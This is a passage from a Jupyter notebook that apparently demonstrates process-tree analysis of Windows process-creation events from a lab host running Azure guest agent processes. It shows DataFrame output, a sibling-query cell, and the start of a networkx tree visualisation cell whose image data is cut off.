" ], "text/plain": [ " TenantId \\\n", "proc_key \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \n", "c:\\windowsazure\\secagent\\wasecagentprov.exe0xda... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \n", "\n", " Account \\\n", "proc_key \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... WORKGROUP\\MSTICAlertsWin1$ \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... WORKGROUP\\MSTICAlertsWin1$ \n", "c:\\windowsazure\\secagent\\wasecagentprov.exe0xda... WORKGROUP\\MSTICAlertsWin1$ \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... WORKGROUP\\MSTICAlertsWin1$ \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... WORKGROUP\\MSTICAlertsWin1$ \n", "\n", " EventID \\\n", "proc_key \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 4688 \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 4688 \n", "c:\\windowsazure\\secagent\\wasecagentprov.exe0xda... 4688 \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 4688 \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 4688 \n", "\n", " TimeGenerated \\\n", "proc_key \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 2019-02-09 22:11:59.877 \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 2019-02-09 23:16:28.153 \n", "c:\\windowsazure\\secagent\\wasecagentprov.exe0xda... 2019-02-09 23:55:46.057 \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 2019-02-10 00:22:33.813 \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 2019-02-10 01:27:25.173 \n", "\n", " Computer \\\n", "proc_key \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... MSTICAlertsWin1 \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... MSTICAlertsWin1 \n", "c:\\windowsazure\\secagent\\wasecagentprov.exe0xda... MSTICAlertsWin1 \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... MSTICAlertsWin1 \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... MSTICAlertsWin1 \n", "\n", " SubjectUserSid \\\n", "proc_key \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... S-1-5-18 \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... S-1-5-18 \n", "c:\\windowsazure\\secagent\\wasecagentprov.exe0xda... S-1-5-18 \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... S-1-5-18 \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... S-1-5-18 \n", "\n", " SubjectUserName \\\n", "proc_key \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... MSTICAlertsWin1$ \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... MSTICAlertsWin1$ \n", "c:\\windowsazure\\secagent\\wasecagentprov.exe0xda... MSTICAlertsWin1$ \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... MSTICAlertsWin1$ \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... MSTICAlertsWin1$ \n", "\n", " SubjectDomainName \\\n", "proc_key \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... WORKGROUP \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... WORKGROUP \n", "c:\\windowsazure\\secagent\\wasecagentprov.exe0xda... WORKGROUP \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... WORKGROUP \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... WORKGROUP \n", "\n", " SubjectLogonId \\\n", "proc_key \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 0x3e7 \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 0x3e7 \n", "c:\\windowsazure\\secagent\\wasecagentprov.exe0xda... 0x3e7 \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 0x3e7 \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 0x3e7 \n", "\n", " NewProcessId ... \\\n", "proc_key ... \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 0x1c54 ... \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 0x123c ... \n", "c:\\windowsazure\\secagent\\wasecagentprov.exe0xda... 0xda8 ... \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 0x7fc ... \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 0x172c ... \n", "\n", " source_index_par \\\n", "proc_key \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... NaN \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... NaN \n", "c:\\windowsazure\\secagent\\wasecagentprov.exe0xda... NaN \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... NaN \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... NaN \n", "\n", " ProcessId_par \\\n", "proc_key \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... NaN \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... NaN \n", "c:\\windowsazure\\secagent\\wasecagentprov.exe0xda... NaN \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... NaN \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... NaN \n", "\n", " NewProcessName_par \\\n", "proc_key \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... NaN \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... NaN \n", "c:\\windowsazure\\secagent\\wasecagentprov.exe0xda... NaN \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... NaN \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... NaN \n", "\n", " TimeGenerated_orig_par \\\n", "proc_key \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 1970-01-01 \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 1970-01-01 \n", "c:\\windowsazure\\secagent\\wasecagentprov.exe0xda... 1970-01-01 \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 1970-01-01 \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 1970-01-01 \n", "\n", " parent_key \\\n", "proc_key \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... c:\\windowsazure\\guestagent_2.7.41491.901_2019-... \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... c:\\windowsazure\\guestagent_2.7.41491.901_2019-... \n", "c:\\windowsazure\\secagent\\wasecagentprov.exe0xda... c:\\windowsazure\\guestagent_2.7.41491.901_2019-... \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... c:\\windowsazure\\guestagent_2.7.41491.901_2019-... \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... c:\\windowsazure\\guestagent_2.7.41491.901_2019-... \n", "\n", " IsRoot IsLeaf IsBranch \\\n", "proc_key \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... False False True \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... False False True \n", "c:\\windowsazure\\secagent\\wasecagentprov.exe0xda... False False True \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... False False True \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... False False True \n", "\n", " path parent_index \n", "proc_key \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 1007/69 1007 \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 1007/103 1007 \n", "c:\\windowsazure\\secagent\\wasecagentprov.exe0xda... 1007/123 1007 \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 1007/134 1007 \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 1007/343 1007 \n", "\n", "[5 rows x 35 columns]" ] }, "execution_count": 17, "metadata": {}, "output_type": "execute_result" } ], "source": [ "src_proc = ptree.get_children(p_tree_win, t_root, include_source=False).iloc[0]\n", "ptree.get_siblings(p_tree_win, src_proc, include_source=True).head()\n" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "## Display a Tree using Networkx" ] }, { "cell_type": "code", "execution_count": 18, "metadata": { "ExecuteTime": { "end_time": "2020-08-25T15:53:48.521996Z", "start_time": "2020-08-25T15:53:47.347997Z" } }, "outputs": [ { "data": { "image/png": "iVBORw0KGgoAAAANSUhEUgAABGoAAARNCAYAAAAKHqaIAAAAOXRFWHRTb2Z0d2FyZQBNYXRwbG90bGliIHZlcnNpb24zLjMuMSwgaHR0cHM6Ly9tYXRwbG90bGliLm9yZy/d3fzzAAAACXBIWXMAAAsTAAALEwEAmpwYAAEAAElEQVR4nOzdd3yN9///8cfJMGITtTdBQiQiYq/YYrSlqPpI1V5FUbtqtNpaRVutIkVbeytVI02NEhpq1G7QWpEQGTLP+/eHX/OtCkVxEp732y23Nudc1/t6XpeT67zP61zX+20xxiAiIiIiIiIiIrZnZ+sAIiIiIiIiIiJymwo1IiIiIiIiIiJphAo1IiIiIiIiIiJphAo1IiIiIiIiIiJphAo1IiIiIiIiIiJphAo1IiIiIiIiIiJphMP9nnR2djbFixd/SlFERERERERERJ59Bw4cuGaMyZvac/ct1BQvXpz9+/c/mVQiIiIiIiIiIs8hi8Vy7l7P6dYnEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaEREREREREZE0QoUaERERSZMCAwPx8/P71+Wi45NYEnyeyZt+Y0nweaLjk+54fs2aNRw7duxJxRQRERF5rFSoERERecIuX75Mhw4dKFWqFK6urjRv3pyTJ0+mumxoaCgVKlQAHrxQkZoZM2YQGxub8nt0dDS9e/emVKlSeHp64uXlxdy5cx+qzX8riAQGBrJ79+6U38eNG8eUKVMeKf+DCg6NwOf9rYzfcIw5QWcZv+EYPu9vJTg0ImWZvwo14eHhxMXFPdE8fzdn7jyavNLlnsdLREREJDUq1IiIiDxBxhhefPFF6tWrx5kzZzh27BjvvfceV65ceaLb/Wehplu3buTKlYtTp04REhLC5s2biYiIuE8Ld3qQgsg/CzWHDh1i6tSpVKpUic6dO3Pu3Dl8fX1xd3fH19eX8+fPA+Dv78+AAQOoUaMGJUuWZMWKFSltREdH07ZtW8qVK0enTp0wxgCwbds2Knl4UNvHi3OrphITe7sA8+eWeZya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